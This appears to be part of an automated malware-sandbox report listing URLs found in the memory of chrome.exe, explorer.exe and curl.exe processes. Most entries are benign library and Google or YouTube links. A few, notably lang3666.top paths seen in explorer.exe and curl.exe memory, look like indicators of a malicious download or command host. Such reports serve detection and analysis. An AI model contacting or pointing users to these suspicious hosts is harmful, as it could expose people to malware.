                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#carousel
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#collapse
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#dropdowns
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#modals
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#popovers
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#scrollspy
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#tabs
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#tooltip
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/docs/3.4/javascript/#transitions
                                  Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/angular/angular.js/blob/v1.4.4/src/ng/urlUtils.js
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/angular/angular/blob/7.2.4/packages/core/src/sanitization/url_sanitizer.ts
                                  Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/jquery/jquery-ui/blob/1.11.4/ui/tabs.js#L53
                                  Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/jquery/jquery-ui/blob/1.11.4/ui/tabs.js#L58
                                  Source: chrome.exe, 00000000.00000003.2333546144.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333473704.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335007919.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330812480.000028EC05D3B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335098135.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2335034183.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2333463397.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
                                  Source: chrome.exe, 00000000.00000003.2322628658.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329979623.000028EC03DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329320398.000028EC053D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329254218.000028EC06CF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323618407.000028EC04B98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/malsup/cycle/issues/44
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/issues/14093
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04ADC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/issues/20280
                                  Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467386602.000028EC02248000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/pagead/form-data
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355904920.000028EC07C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360579493.000028EC07D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377692978.000028EC0693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/id?slf_rd=1
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/viewthroughconversion
                                  Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grack.com/blog/2009/11/17/absolutizing-url-in-javascript
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gunosy.com
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi/gobWGqPjLSQ/hqdefault.jpg?sqp
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi_webp/gobWGqPjLSQ/default.webp
                                  Source: chrome.exe, 00000000.00000003.2330399294.000028EC053E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330280472.000028EC06B23000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329480790.000028EC06A94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi_webp/gobWGqPjLSQ/hqdefault.webp
                                  Source: chrome.exe, 00000000.00000003.2334224640.000028EC067EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi_webp/gobWGqPjLSQ/mqdefault.webp
                                  Source: chrome.exe, 00000000.00000003.2378086246.000028EC080B2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2375308476.000028EC06B40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2354362022.000028EC07CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330516367.000028EC067EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2386041638.000028EC07B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://i.ytimg.com/vi_webp/h15NcT6UXh0/maxresdefault.webp
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ingereck.net
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jnn-pa.googleapis.com
                                  Source: chrome.exe, 00000000.00000002.2484044727.000028EC0367C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2354362022.000028EC07CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create
                                  Source: chrome.exe, 00000000.00000002.2496006842.000028EC048C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2378591472.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495865997.000028EC04894000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377692978.000028EC0693C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2386041638.000028EC07B40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT
                                  Source: chrome.exe, 00000000.00000002.2505295670.000028EC07AAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/GenerateIT(z
                                  Source: chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348334197.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494396786.000028EC04574000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488681723.000028EC03D38000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361208200.000028EC02578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://juice-bet.com/
                                  Source: chrome.exe, 00000000.00000003.2400418744.000028EC049D9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348334197.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361208200.000028EC02578000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400466181.000028EC07EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://juicebet-bookmaker.com/
                                  Source: chrome.exe, 00000000.00000002.2476347082.000028EC02DF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://kompaspublishing.nl
                                  Source: chrome.exe, 00000000.00000002.2443190026.000001E4AFD84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2432437305.0000000006ED5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2432437305.0000000006DE5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2250792493.0000000006ED5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2250792493.0000000006EC5000.00000004.00000001.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1778104266.000001366F8D4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778739442.000001366F8DA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778789152.000001366F90B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1778353998.000001366F8D7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778672642.000001366F8C7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000002.1778672642.000001366F8C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1777943451.000001366F908000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1778212265.000001366F90B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lang3666.top/lv/ddas.php
                                  Source: chrome.exe, 00000000.00000002.2489880900.000028EC03EE0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2495529652.000028EC04804000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490969003.000028EC04018000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2507173491.000028EC07D3C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://lang3666.top/lv/xfa.js
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://local;/file/index.m3u8;://;:;index.m3u8;1969-12-31T15:45:03.000-08:15;Nt;r;//;?;1970-01-01T0
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.youtube.com
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/J
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478797391.000028EC03124000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482574043.000028EC03494000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469526072.000028EC02404000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                                  Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://metro.co.uk
                                  Source: chrome.exe, 00000000.00000003.2321101380.000028EC04A94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321101380.000028EC04AE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320981838.000028EC06E70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322532094.000028EC03B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://modernizr.com/)
                                  Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sitepoint.com/jquery-function-clear-form-data/
                                  Source: chrome.exe, 00000000.00000003.2343629747.000028EC062AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtbe.com/
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484247572.000028EC036C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                                  Source: chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362150726.000028EC05374000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2438376642.000001E4AC843000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 00000000.00000002.2497831692.000028EC04E14000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360579493.000028EC07D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474598295.000028EC02B94000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500594658.000028EC06708000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494077088.000028EC04569000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2479725878.000028EC03244000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 
00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488508263.000028EC03CD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                                  Source: chrome.exe, 00000000.00000003.2323529169.000028EC04BB9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370154176.000028EC062EB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2369897325.000028EC07F03000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323428029.000028EC04BD5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2323304427.000028EC06A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si
                                  Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2497731752.000028EC04DF8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=
                                  Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=2rCuE23kHaX4E8A
